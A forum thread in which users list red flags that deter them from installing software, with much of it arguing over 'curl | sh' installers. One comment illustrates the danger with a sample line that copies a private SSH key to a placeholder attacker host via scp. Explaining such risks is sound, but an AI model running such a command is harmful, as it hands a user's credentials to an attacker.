Have you ever found a GitHub project or anything that seemed nice and tempting to install until you dug a bit deeper?
What are some red flags that should detur anyone from installing and running something?
You must log in or # to comment.
“Call us for pricing”
Aaaaaand tab closed.
I can’t believe that marketing people are this fucking stupid.
Like, full-on knuckle-dragging morons.
They intentionally drive away more paying customers than they could ever “channelize” with this method.
Because most people realize that prices are only ever hidden for malicious, anti-consumer purposes.
Thats for every industry. The burger van with the prices in micro-text behind the guy asking what you want and you better hurry up cause theres a queue
Your example can be wholly explained by inadequate knowledge of visual design (UI/UX, to be specific), especially from a consumption/access position. That’s a technical outcome which is a result of ignorance or failures, not a sales outcome from an explicit strategy of obfuscation.
To put it another way, people making too-small signs for their yard sale that drivers just cannot see at speed, is not the same as companies going “call for pricing”. That would be the same as signs saying, “call us for the yard sale address”. The former is wholly unintentional and borne out of ignorance, the latter is completely intentional anything but accidental.
Signing-in before being able to use a FREE software.
-glares at Canva after buying Affinity -
That’s why they bought it
Yeah, but it’s still irritating. The only function they added to the software that i use is Image Trace. Otherwise i still use the old Affinity Designer that i bought years ago.
Serif were always great, I’m a bit doom and gloom on it
😭
“This project has been archived on [10+ years ago]. It is now Read Only.”
or
Last commit 5+ years ago
Depends. Software can be done.
Shoutouts to picocrypt!
Venture capital funding. The plan is always to do a rug pull. Though if it properly freely licensed and the code is reasonable enough to be forked, it’s less worrying but still risky. It’s better to work with honest people.
This is why I avoid Bluesky
https://bsky.social/about/blog/03-19-2026-series-b
I didn’t know this about bluesky D:, but it makes sense. Thanks for the heads up. The atproto ecosystem seems to have cool features for user empowerment and it seems to work well on the few occasions I’ve visited atproto sites. I hope they can find an ethical way to persevere, but I can’t imagine that being easy.
If the project maintainer has a policy of “no politics allowed.”
Rather than a policy more along the lines of “be respectful”
100%.
Then you look through their history and it’s them laugh emojiing something like doing a LGBT suicide or some ridiculous shit.
curl | shinstallation method- vomit-colored website, vomit-colored developer avatars, or more obvious: AGENTS.MD in the repo
- compiling yourself is “unsupported”/“not recommended”
- the official website aggressively advertising the company’s SAAS which makes it look like their opensource software is actually paid product
- github issues using convoluted template, instead of letting me write freeform text
It’s annoying that the Proxmox helper scripts are all curl | sh based.
Noob here, what’s wrong with curl | sh installs?
The real answer is that user-agents can be used to show you one version in your browser and then serve you another one with curl.
I say “real” because all the idiots talking about “don’t run scripts from the internet!!!” probably forget they don’t decompile every binary they run. E.g. the rustup installer (the tool for managing Rust toolchains) is by default a curl+bash one liner. Why would I worry about them serving me a wrong script when I’m any way about to run their binary blob?
If you have any doubt about the hosting service (which might or not be the same as the software author!) then avoid piping into bash, but then why would you run their code at all if you distrust them so much? Do you expect github to install a keylogger? Probably not. Some telemetry hook to know whose running the requested script? Possibly someday
“Download this shell script from the web and execute it right away.”
Probably close to 80% of the words in the sentence are wrong.
Let’s say you curl bash something and it has ie ‘scp ~/.ssh/id_ed25519 badComputerGuy’ in it then you just uploaded your private key to the bad guys. And that’s why ssh keys should be password protected
As others have said, you are boldly trusting that the script you’re downloading is safe. ALWAYS examine a script before you pipe to bash. Also, open the script in your browser, the copy paste j to your terminal. It’s entirely possible to change the script based on use agent to display differently when your check in your browser versus when you pipe to bash
In THEORY they’re bad because the script could do malicious things and you shouldn’t blindly trust random people on the internet telling you what to execute.
In practice it’s mostly fearmongering because you’re likely trying to install a binary that could do malicious things anyways. “Mostly” because it is a bit less safe as one could MITM the script more easily or something, but not really by that much.
You shouldn’t run
curl | shscripts some random person sends you, but running an official script prom an official source is no more dangerous than running a .Deb file from that same source.It forces you to blindly trust that whatever script curl will download is save to run and does exactly what you want / was promised as it will be executed right away.
- how does curl into sh differ from downloading exes from the Web, or pip/npm/crago/mvn install
- gods forbid people had bad design skills
- AGENTS.md: gods forbid people used tools that I do not agree with
- next 2 I agree with
- people are terrible at describing bugs, they often do not add steps to reproduce, expected outcome, so the bug template helps waste less time
Back in the Python 2.7 days,
curl | grep shwas the standard practice for installing the package manager, pip. Even better, the shell script actually had a binary blob somewhere in the middle. It was shell script up top, binary blob in the middle, and back to shell script at the bottom. Until Python 3.5ish, pip wasn’t bundled with Python, so this was standard practice.Some mature projects still do curl .sh, like pivpn and pihole.
which makes sense because they don’t maintain packages on the dozens of different package manager repos.
IMO it’s kind of bogus to knock a project for having a shell install file.
Eh, I’d be more sympathetic if there weren’t a dozen different alternatives to making this exclusively how people install your software.
It’s a virus delivery system waiting to happen. Especially now when you have AI that can help you stand up an imposter site quickly and easily.
If it’s not open source or you are not compiling it:
Why so much fear about the shell script but no fear from the executable?
If it’s open source and you are compiling it:
If you don’t fear the project because you (presumably) have read the source code and determined that it’s fine, why fear a shell script that is most certainly simpler, and you can read it like the rest of the code?
Why so much fear about the shell script but no fear from the executable?
Huh? Fear from both.
If you fear both, and
curl | shis a red flag. Binary blob is also a red flag, if you fear them both equally.Has every software that runs in your computer been compiled by you?
No, but much of it comes from software repositories, which is exactly the point.
it’s not the impact to the user having dozens of choices.
it’s the impact to the developer to having to maintain the packages for dozens of package repo admins that have each their own special requirements for packages that have to be followed. it’s a huge pita that most companies don’t even bother with and just run their own package repo.
IMO the user isn’t blameless when using an install script. anyone who just blindly runs arbitrary code without reading it is a fool asking to be attacked.
Exactly, it’s a shift in responsibilities from the developers of a thing to the users of that thing.
As a grunt at work and a mid-tier “money haver” at best, I’m tired of having everything shift its costs onto me and it’s a red flag that prevents me from installing and running a software package.
Everything around nowadays does this shift if they can get away with it.
I have to set limits on what I tolerate to achieve what gain or the world will leave me dead with a giant tire mark across my chest.
as a foss dev, your problems aren’t my problems.
As a sporadic foss contributor and foss advocate, I ain’t even installing your shit if the only install option is curl pipe to shell.
And I also do think it’s a red flag exactly like the original poster was looking for.
-
It’s not already in my distro’s package manager
-
A github project with 1000 open issues and no commits for 3 years.
My distro has one of the highest amount of software packaged, yet i regularly find software i like that isn’t. There will always be software that isn’t packaged yet useful, i reckon.
Ubuntus package repo is so out of date though. It’s such a pain in the ass.
You clearly haven’t seen Debian stable.
-
A rule of thumb I use is how desperate the software is to tell you the weather even when you never asked for it or even set it up to report it.
Something I ran into just now was AI generated Imagery in Docs or as an Icon.
I am not even that Anti AI as many on here I feel like. But this is a sure fire way to show how much you don’t give a shit about your project. Just use emojis or some shit which is ironically even less work but somehow makes it seem more deliberate.I tried to explain that to my manager but he didn’t believe me
Had a conversation with someone recently about exactly this. Usage of AI generated assets gives me exactly the same feelings as a local business using a gmail or personal ISP email account on their advertising.
It doesn’t automatically mean it’s bad, but it’s an indication that whoever is running things just can’t be bothered to put in effort.
Bun seems cool, but it’s icon looks too much like slop
I don’t think it is. IIRC they had that before AI Image Generation was widely available. You really can’t tell though with the simple cute art style which AI can very easily recreate.
"To use program xyz, sign up!
- New post about a promising selfhosted app
- looks inside
- em dashes, emojis, release in last 24h with 35 commits since.
I fucking swear, if only vibe coders would ACTUALLY write up their own posts about THEIR OWN SOFTWARE, many would not act harsh towards them as much as it happens.
What’s wrong with em dashes? I use it wherever English syntax requires it.
Requires weird IDE to build
I shifted 8 GB of files to an older machine just to be able to install Android Studio on barely-supported hardware, and now I’m cloning the repo and the
.gradledirectory alone is 1 GB?I bet they checked in the binary. Git is really poor with binaries since it can’t really diff them. And the worst part is gradle should never have the binary in the source tree
You don’t even need to check in .gradle to a repo, I always have that gitignored. And gradle projects should specify commands to build from CLI rather than having you download an IDE. Android Studio gives you a nice run button but it’s just invoking ./gradlew installDebug under the hood
I’m amused that you mentioned requiring an IDE and then gave gradle (a standalone build tool) and Android as an example… when I’m pretty sure that ios actually requires xcode (AND an apple account) to build apps
The repo does not actually contain the source code, instead a link to download from a different site.
Unless that different site is Codeberg.
Or git.gay or Bitbucket.com
GitHub repo that has “pm me on telegram” instead of code
join our discord
The project is requires really weird unconventional set up. Doesn’t package properly, configuration files in weird places, doesn’t follow convention but doesn’t gain anything from it
